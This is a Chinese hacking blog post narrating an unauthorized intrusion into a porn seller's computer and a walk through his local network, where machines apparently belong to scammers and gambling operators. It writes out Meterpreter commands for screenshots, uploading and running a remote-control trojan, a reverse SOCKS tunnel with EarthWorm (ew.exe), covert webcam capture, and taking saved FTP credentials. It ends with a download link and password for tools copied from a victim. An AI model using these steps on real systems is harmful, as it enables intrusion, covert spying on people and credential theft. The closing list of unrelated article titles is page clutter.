对微信卖小电影的一次内网漫游
前几天看到某个微信卖小电影的,然后通过套路拿到拿到对方电脑控制权以后,对他内网进行了一次漫游,特地给各位大佬分享下过程。
本文作者:i春秋作家——jasonx
另外各位表哥,如果你感觉文章还不错,动动你的手指,在文章的底部帮我点赞,谢谢。^_^
**0×01 我是如何拿到控制权的?**
这个问题我以后也许会说出来,但是目前不能说,因为影响太大了,通过这种手段攻破的电脑,基本都是骗子,BC,还有搞灰黑产的。
因为利用这个骚路子,让我看到了那些搞灰黑产的各种套路深啊。
**0×02 先看看微信卖小电影的**
通过msf反弹拿到的,我们在msf下输入screenshot可以对他进行截屏,并发送到我们的/root目录下
然后为了方便控制,用下面的命令上传远控到他电脑上,并运行。
upload m.exe c:\\windows\\m.exe
shell
c:\windows\mr.exe
上线以后我们先看看内网情况。
ipconfig可以查看他本机的IP。
继续输入arp -a 查看他内网的其他电脑。
发现存在好多台电脑。
通过远控的文件管理功能可以看到,这家伙电脑里面到处都存了各种 不可描述.mp4
各位表哥先别留邮箱,我真的没下载他的小电影….真的没下…没下..ヾ(゚∀゚ゞ)
**0×03 反弹代理撸内网**
通过远控上传ew.exe
然后在本地执行:ew.exe -s rcsocks -l 1008 -e 888
说明:监听888端口,把接收到的数据转到本地的1008端口。
在目标上执行ew.exe -s rssocks -d 10.10.10.10 -e 888
说明:开启sockes 并反弹到ip地址为10.10.10.10 端口为888
反弹代理成功以后,本地会出现rssocks cmd_socket ok!
现在打开我们的SocksCap64,新建一个代理。
ip为127.0.0.1端口为1008,配置好了以后,点击保存。
现在我们把需要走代理的工具都放到SocksCap64里面。
现在我们扫描下他的内网
内网挨个打一发,发现了不得了的事情了。
打下的第一台电脑截屏如下,看到这么多QQ,一看就知道不正常了。
上远控继续翻他文件
不用说了,有各种骗人的话术,还有通过远控发现他在骗人,证明这TMD就是个专业搞诈骗的。
这里科普下:骗子基本都会有很多套话术,他和你聊天的时候,基本都是一条一条复制黏贴的,最后直到对方上当。
我们在kali里面用命令webcam_list查看下他是否有摄像头。
图中可以看到,有摄像头。
继续输入webcam_snap -i 1 -v fales可以实现不开闪光灯偷偷利用他摄像头拍照,并发送到我们kali的/root目录下。
不过你会发现,摄像头被东西挡住了,太TM狡猾了。
又继续在内网撸了几台,大多数都是BC的。
**0×04 有意思的来了**
最后撸到一台,dir查看他桌面文件的时候,发现了一些扫描软件,你没猜错,这是个大黑阔。(o゚▽゚)o
还是老套路,上传远控并运行。
然后通过远控的文件管理翻下他文件,不得了..不得了,各种CMS的exp。
顺便看看大黑阔的工具….
远控监视大黑阔电脑屏幕看看…
大黑阔看到这贴不要打我,我真的是不小心进来的…ヾ(●´∀`●)
翻文件的时候发现一个ftp软件,突然灵机一动……{:6_176:}
很多ftp软件都会保存你的用户名、密码、ip等等,方便你下次连接,但是这些配置信息一般都是在ftp软件的目录下的。
那么我们只要下载他的ftp软件所有文件下来…..
下载完以后,我们打开ftp看看,在站点列表里面有十几个ftp,登陆上去一看。
好家伙,全是BC站…..
总结:我只能说一句“牛逼了”一个局域网内的人基本都是搞灰黑色产的,内网撸了一遍,基本上所有电脑都没杀软,其中有几台装有某某管家,但是注入dll的时候,竟然连警告都没有……起码人家某数字杀毒还会报毒。
打包了部分大黑阔电脑上下载的工具,链接:https://pan.baidu.com/s/11azFaSRmAsQNQUgOgXFGLA
密码:wkhs
>>>>>> 黑客入门必备技能 带你入坑和逗比表哥们一起聊聊黑客的事儿,他们说高精尖的技术比农药都好玩~
对微信卖小电影的一次内网漫游相关推荐
- Java 文件传输小工具,网络传输文件,内网传输
文件传输小工具,网络传输文件,内网传输 换了一台电脑,想把一台电脑的资料放到另一太电脑上,由于没有太大的U盘就动手用Java写了个小工具.有需要的朋友下载使用! 运行环境 运行环境需要安装JDK,并配 ...
- 搭建Freekan私人影视电影网站,cpolar内网穿透发布上线
文章目录 1.前言 2.本地网页搭建 2.1 环境使用 2.2 支持组件和环境设置 2.3 支持组件选和环境设置 2.4 网页安装 2.5 测试和使用 2.6 问题解决 3.本地网页发布 3.1 Cp ...
- 微信公众号开发本地调试【内网穿透】
在做微信公众号开发的时候,必须接入外网已经备案的URL地址,不然本地没法进行调试,比较简单的方法可以做内网穿透,映射生成一个外网URL地址来进行回调测试. 这里推荐一个内网穿透工具--cpolar,可 ...
- 小程序x钉钉内网穿透(windows) 步骤
下载钉钉内网穿透(https://github.com/open-dingtalk/pierced) 下载完解压 在windows_64文件夹里新建 一个txt shaw9是自定义的域名 8080是 ...
- 怎么用matlab做loop_用小程序做微信卖菜社区团购,可行吗?怎么做?
自诞生以来,微信小程序因为具有获客成本低.使用便捷等优势,获得了许多商家及用户的青睐,例如最近很火爆的本身体量较轻的"社区团购"行业,包括兴盛优选.食享会.十荟团.考拉精选.同程生 ...
- 微信品牌小程序开启公测 认证通过即享专属产品能力
据悉,微信在7月24号正式启动品牌小程序公测.认证后的品牌小程序可在多个场景下获得"官方"背书标签,并在小程序搜索页面获得专属的产品能力. 目前,微信提供"通用品牌认证& ...
- 微信网页小游戏网站源码带后台+可后台添加游戏+推荐到微信
微信网页小游戏网站源码带后台,淘宝上卖的很火的源码,免费公开!
- 为什么别人在微信卖东西不会被人拉黑
为什么别人在微信卖东西不会被人拉黑,而你在微信上卖东西会被人拉黑?你认为是微信上卖东西不靠谱,还是你自己存在问题,所以在微信上卖东西,取得不了成功?好吧,我来为微商鼓鼓劲,来揭示一下在微信上究竟应该怎 ...
- Cocos Creator 微信创意小游戏《甜蜜糖果屋》团队专访:让纸片人活起来
在 1 月 9 日的 2019 微信公开课 Pro 上,有一款创意十足的互动式游戏出现在小游戏宣讲环节,它便是今日 Cocos 的专访对象<甜蜜糖果屋>. <甜蜜糖果屋之花恋奇妙物语 ...
最新文章
- E1载波的数据速率是(16)Mb/s,E3载波的数据速率是(17)Mb/s。答案】B D
- ScrollView 内嵌 ListView 只能看到第一个Item
- 在swt中获取jar包中的文件 uri is not hierarchical
- pandas教程:pandas主要功能详解
- hdu 4556 Stern-Brocot Tree
- Shiro框架:Shiro简介、登陆认证入门程序、认证执行流程、使用自定义Realm进行登陆认证、Shiro的MD5散列算法
- 常见的14种异常心电图的波形特点
- Socket 多线程FTP软件开发
- xcode 常用快捷键
- golang解析嵌套yaml配置(局部解析)
- 如何在WP模拟器中启动、暂停、重启应用
- 繁体中文游戏乱码解决工具
- T420i 简单拆机 (只拆两个螺丝清灰)
- 车险赔付率分析报告_车险经营情况分析报告模板.ppt
- python3 爬虫 HTTP Error 403:Forbidden
- Please make sure that the app id is set correctly.
- 论文阅读:SPR:Supervised Personalized Ranking Based on Prior Knowledge for Recommendation
- 数据分析/运营——数据异常的排查方法
- flash air java_Flash Air 打包安卓 ane
- 巨准拓客CRM【工商财税】行业获客解决方案
热门文章
- 华三模拟器 HCL无线网络搭建+AC桥接到本地
- css3中-moz、-ms、-webkit、-o分别代表的意思
- 如何跳过htpps安全连接(webservice/get/post)
- 《迅雷链精品课》第一课:认识区块链
- canvas教程8-小球连线之碰壁则返
- 常用ansible命令
- java中隐函数求导法则_隐函数求导的三种方法
- 简单易懂的并查集算法以及并查集实战演练
- 保命小诀窍:IDEA远程Debug技巧,你了解吗?
- inter uhd graphics630显卡驱动_Intel新驱动已支持Win10 H2更新、11代酷睿狂喜